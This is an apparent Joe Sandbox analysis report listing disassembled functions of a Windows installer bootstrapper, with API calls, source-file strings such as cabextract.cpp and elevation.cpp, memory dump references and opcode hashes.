CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,009B08B1,?,?), ref: 009B0CF8

Strings

Invalid operation for this state., xrefs: 009B0C9D
cabextract.cpp, xrefs: 009B0C93

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 8378df1358d9bcf1efaf1b6e8ea29f8a035e99d4fe62bdb853d3af157f26ca94
Instruction ID: 28f3fbb104d9604c1d94ee8b2462f756540d1dd8af5660bd37daea95676a5af6
Opcode Fuzzy Hash: 8378df1358d9bcf1efaf1b6e8ea29f8a035e99d4fe62bdb853d3af157f26ca94
Instruction Fuzzy Hash: A321D572811219AB8B109FA9CE099FB7BBCFF847307508216F964D65D0D774E951CB90

Function 009A4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,009A539D), ref: 009A4AC3

Strings

pipe.cpp, xrefs: 009A4AFB
Failed to allocate message to write., xrefs: 009A4AA2
crypt32.dll, xrefs: 009A4A7D
Failed to write message type to pipe., xrefs: 009A4B05

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
API String ID: 3934441357-606776022
Opcode ID: 79fcc512ec71d0dfc00e6821f4f90d1cfdffe7ec90912df2b8321e54bd0288c0
Instruction ID: 31a5aa21ab9063f6e460228152f90964f1ea2e93a3e789cece3c38a04dbd62d6
Opcode Fuzzy Hash: 79fcc512ec71d0dfc00e6821f4f90d1cfdffe7ec90912df2b8321e54bd0288c0
Instruction Fuzzy Hash: 5F11AF32981129BBCF21CF89DD05B9E7BA8EFC1750F114066FD00B6240D7B19E50D6E0

Function 009A4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

_memcpy_s.LIBCMT ref: 009A4693
_memcpy_s.LIBCMT ref: 009A46A6
_memcpy_s.LIBCMT ref: 009A46C1

Strings

feclient.dll, xrefs: 009A465B, 009A4691
pipe.cpp, xrefs: 009A4672
Failed to allocate memory for message., xrefs: 009A467C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-766083570
Opcode ID: 79159df955337ec0f7a4a44d75c5d7d13f06526052d29b7a645f6dff1653cf22
Instruction ID: 16f4d718075034c1b464eb65bbd065cf749c0ecabb33651ab074ad8c4b33aa4c
Opcode Fuzzy Hash: 79159df955337ec0f7a4a44d75c5d7d13f06526052d29b7a645f6dff1653cf22
Instruction Fuzzy Hash: 5A11A37654030AABDF01EE99CC82EEB73ACEF95714B004526FA10DB141D771DA54C7E0

Function 009D3C72 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 009D3CC0
GetLastError.KERNEL32(?,?,00000000), ref: 009D3CCA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 009D3CFD

Strings

<, xrefs: 009D3CB2
shelutil.cpp, xrefs: 009D3CEB
PDv, xrefs: 009D3CC0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$PDv$shelutil.cpp
API String ID: 3023784893-3964616157
Opcode ID: dc27f3b504aab825c47efa04ef0530e2b37b063fa0fa3f62a7bea506c358df30
Instruction ID: c66974708e1da14509c25d3d866ce42adb2951d6057c668784232c9285c58d5b
Opcode Fuzzy Hash: dc27f3b504aab825c47efa04ef0530e2b37b063fa0fa3f62a7bea506c358df30
Instruction Fuzzy Hash: 0E111A75E41219ABCB10DFA9D945A8E7BF8BF08751F00811AFD05F7340E7309A00CBA5

Function 00999A4D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00999AC4

Strings

Failed to select condition node., xrefs: 00999A7B
Condition, xrefs: 00999A5F
Failed to copy condition string from BSTR, xrefs: 00999AAE
`5w, xrefs: 00999AC4
Failed to get Condition inner text., xrefs: 00999A94

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString
String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`5w
API String ID: 3341692771-808312051
Opcode ID: e3dee67847228e517c1e47912f84e9bf52191cc3f727b820de8a5cb4a526616b
Instruction ID: c71fc2762d08249b7aa2e6d4a1dc1e3786fb47bcb967122fa180e7ba7f46e443
Opcode Fuzzy Hash: e3dee67847228e517c1e47912f84e9bf52191cc3f727b820de8a5cb4a526616b
Instruction Fuzzy Hash: AB11A531997228BBDF119B9CCD06FADB768EF40711F14815AFC01B7250D7759E40D690

Function 009967AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 009967E3
GetLastError.KERNEL32 ref: 009967ED

Strings

4Wu, xrefs: 009967E3
Failed to get temp path., xrefs: 0099681B
Failed to set variant value., xrefs: 00996837
variable.cpp, xrefs: 00996811

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4Wu$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-1711421887
Opcode ID: 2ba68aeb435b2facad1ca7a52371b356fd71329532760657dd52f843380ccc45
Instruction ID: 0f82363ed7701af1ebc793f86fb3231f2012cfcb934023ecb7a996ee46a51a9c
Opcode Fuzzy Hash: 2ba68aeb435b2facad1ca7a52371b356fd71329532760657dd52f843380ccc45
Instruction Fuzzy Hash: 0E014E72E8233967DB20A7995C06FEE735C9F44B10F014156FE04F7281EB609D0086D5

Function 009D96CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 009D96E7
AcquireSRWLockExclusive, xrefs: 009D96FC
ReleaseSRWLockExclusive, xrefs: 009D970C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 45d6122b75692fc2b194ae5bafea4dce6ab89bbbd74487d918592db3a5cadd78
Instruction ID: 52a062548841cdefaae0163d0d26a35fb6e040b65ef2972cd68a222ab9b2c319
Opcode Fuzzy Hash: 45d6122b75692fc2b194ae5bafea4dce6ab89bbbd74487d918592db3a5cadd78
Instruction Fuzzy Hash: 0001D1616F63229B4F202EA59CC09B7238C5B023A5311817BE631D3300EB51C885B790

Function 009D0ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00995EB2,00000000), ref: 009D0AE0
GetProcAddress.KERNEL32(00000000), ref: 009D0AE7
GetLastError.KERNEL32(?,?,?,00995EB2,00000000), ref: 009D0AFE

Strings

kernel32, xrefs: 009D0AD8
procutil.cpp, xrefs: 009D0B1F
IsWow64Process, xrefs: 009D0AD1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 978c8f853df7d5bcd439f23c82557d6e99bf2bc5b8a34906d16c5eae3bf38a5b
Instruction ID: 36d30ff8db812992900232c05451942ee3537db4d2870edfd6eb04fe31961c96
Opcode Fuzzy Hash: 978c8f853df7d5bcd439f23c82557d6e99bf2bc5b8a34906d16c5eae3bf38a5b
Instruction Fuzzy Hash: 47F0A972A99229E78B109BD5DC05A5B7B68AB44754F018157BD04A7340DB74DD00D7D0

Function 009CA20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009C3479,009C3479,?,?,?,009CA45C,00000001,00000001,ECE85006), ref: 009CA265
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009CA45C,00000001,00000001,ECE85006,?,?,?), ref: 009CA2EB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009CA3E5
__freea.LIBCMT ref: 009CA3F2

Part of subcall function 009C521A: HeapAlloc.KERNEL32(00000000,?,?,?,009C1F87,?,0000015D,?,?,?,?,009C33E0,000000FF,00000000,?,?), ref: 009C524C

__freea.LIBCMT ref: 009CA3FB
__freea.LIBCMT ref: 009CA420

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: 9a2fad7a572efa7004f35083c02fdcbcd005724172e49af8449a46d620874d43
Instruction ID: e24ebe4f301e6076ba03ffc0eacb2bcb03fb264425ce26fb9ed00e634712c5d9
Opcode Fuzzy Hash: 9a2fad7a572efa7004f35083c02fdcbcd005724172e49af8449a46d620874d43
Instruction Fuzzy Hash: FE512F32E1025AABEB248F64CC95FAF37A9EB84758B15466DFC14D6180EB34DC80C663

Function 009A8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 009A8D18

Strings

Failed to get old %hs package cache root directory., xrefs: 009A8DB8
Failed to calculate cache path., xrefs: 009A8CD5
per-user, xrefs: 009A8D72, 009A8D77, 009A8DB2, 009A8DB7
per-machine, xrefs: 009A8D69, 009A8DA9
Failed to get %hs package cache root directory., xrefs: 009A8D78

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: b7f650c4241ec5ced7301d50a2d414ac21f52e8ffc495a75b13c2d7f957efd2f
Instruction ID: 59032ed8e55ddcd5bd80090074e0acf10c701d931590e18dfffcfe348342b5ff
Opcode Fuzzy Hash: b7f650c4241ec5ced7301d50a2d414ac21f52e8ffc495a75b13c2d7f957efd2f
Instruction Fuzzy Hash: 9431F672A40629BBEF22AA648C46FBF626CDF62760F114425FD00F62D1EB358D0097E1

Function 009AE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 009AE985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 009AE994
SetWindowLongW.USER32(?,000000EB,?), ref: 009AE9A8
DefWindowProcW.USER32(?,?,?,?), ref: 009AE9B8
GetWindowLongW.USER32(?,000000EB), ref: 009AE9D2
PostQuitMessage.USER32(00000000), ref: 009AEA31

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 930b8830dc02d5b7277aae1a5500a8b1389428e62d838908c64775b831ee0ffc
Instruction ID: 6717ba8906f94b4c59bcb473d27b3ec5704943df4e8b501553198cd7ec79482c
Opcode Fuzzy Hash: 930b8830dc02d5b7277aae1a5500a8b1389428e62d838908c64775b831ee0ffc
Instruction Fuzzy Hash: 2C21B036105209FFDF119F68DC49E6A7B69FF86310F158618FA0AAA1A4C731DD50EBA0

Function 009AC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 009AC811
CloseHandle.KERNEL32(?), ref: 009AC819

Strings

Unexpected elevated message sent to child process, msg: %u, xrefs: 009AC9C4
Failed to save state., xrefs: 009AC891
elevation.cpp, xrefs: 009AC9B8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: c2ea05577d011b559d8c4d8303f7db5639f19af228f376b6ca99145740e341df
Instruction ID: a94ae0da75c7adbdd1258c67218ac12a88090da6d5d675fa1052f5a9b3dca51e
Opcode Fuzzy Hash: c2ea05577d011b559d8c4d8303f7db5639f19af228f376b6ca99145740e341df
Instruction Fuzzy Hash: D961B47A100514EFCF125F84CD01D66BBB2FF893147158959FAA95A632C732E821EB81

Function 009D7B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

SysFreeString.OLEAUT32(00000000), ref: 009D7C74
SysFreeString.OLEAUT32(00000000), ref: 009D7C7F
SysFreeString.OLEAUT32(00000000), ref: 009D7C8A

Strings

`5w, xrefs: 009D7C69
atomutil.cpp, xrefs: 009D7B49

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `5w$atomutil.cpp
API String ID: 2724874077-1718187286
Opcode ID: 409a872731e44bec9de8cb2f90569d7b45ec5b4f0ccb0927f44ad2da76e99845
Instruction ID: 46248b6fde3c35e8894cc4911142667a2927b37a31ebe194c9eb6545f3eb690d
Opcode Fuzzy Hash: 409a872731e44bec9de8cb2f90569d7b45ec5b4f0ccb0927f44ad2da76e99845
Instruction Fuzzy Hash: 2A51833195522AAFCB21DFB4C844FAEF7B8AF44710F15819AE945AB310E771ED00CB90

Function 009D1217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 009D123F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009A70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 009D1276
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 009D136E

Strings

regutil.cpp, xrefs: 009D12BF
BundleUpgradeCode, xrefs: 009D121E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 7eab4fcfc0a7a11510fd419fc8d229b1177efa8ade3924f304f317fdaa468108
Instruction ID: cc118ed8ccf1fabb6de802572837b96e72511153a0e2e4f00ed17304a709671c
Opcode Fuzzy Hash: 7eab4fcfc0a7a11510fd419fc8d229b1177efa8ade3924f304f317fdaa468108
Instruction Fuzzy Hash: C7418037A8021AFFDB219F95C885AAEB7ADAB44710F15816BE901EB710D6319D10DBA0

Function 009D6357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009D490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,009A8770,00000000,00000000,00000000,00000000,00000000), ref: 009D4925
Part of subcall function 009D490D: GetLastError.KERNEL32(?,?,?,009A8770,00000000,00000000,00000000,00000000,00000000), ref: 009D492F

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,009D5C09,?,?,?,?,?,?,?,00010000,?), ref: 009D63C0
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,009D5C09,?,?,?,?), ref: 009D6412
GetLastError.KERNEL32(?,009D5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 009D6458
GetLastError.KERNEL32(?,009D5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 009D647E

Strings

dlutil.cpp, xrefs: 009D64A2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: 06176ce069ae11223ba6fba1a4cba5255d5953ff404af32a6fcf46e8349580bc
Instruction ID: 7045204611716eb377c4ea656d1b7e004eabb5298a3c8fb1f292c0a37b95dc7b
Opcode Fuzzy Hash: 06176ce069ae11223ba6fba1a4cba5255d5953ff404af32a6fcf46e8349580bc
Instruction Fuzzy Hash: D641A07298021AFFDF218E94CD45BAA7B69EF04764F158126FD00A62A0D771DD60DBA0

Function 00992428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,009CFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009CFFEF,009B12CF,?,00000000), ref: 0099246E
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009CFFEF,009B12CF,?,00000000,0000FDE9,?,009B12CF), ref: 0099247A

Part of subcall function 00993BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BDB
Part of subcall function 00993BD3: HeapSize.KERNEL32(00000000,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BE2

Strings

strutil.cpp, xrefs: 0099249E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 72045d5916da0513ae1bfbaac51adcb0a0702541614dd5a0dd9f3cc7114dad78
Instruction ID: 6ccc62355d014952af480299397b01bb03a549951349d2a1d00b1a3ad9ce76ac
Opcode Fuzzy Hash: 72045d5916da0513ae1bfbaac51adcb0a0702541614dd5a0dd9f3cc7114dad78
Instruction Fuzzy Hash: D931143030421AFFEF109F6D8CC4A76339DAB557A4B218229FE119B2A0EB74CC4097A1

Function 009BAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 009BADB3

Strings

Failed to extract all payloads from container: %ls, xrefs: 009BADF7
Failed to open container: %ls., xrefs: 009BAD85
Failed to extract payload: %ls from container: %ls, xrefs: 009BAE3E
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 009BAE4A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
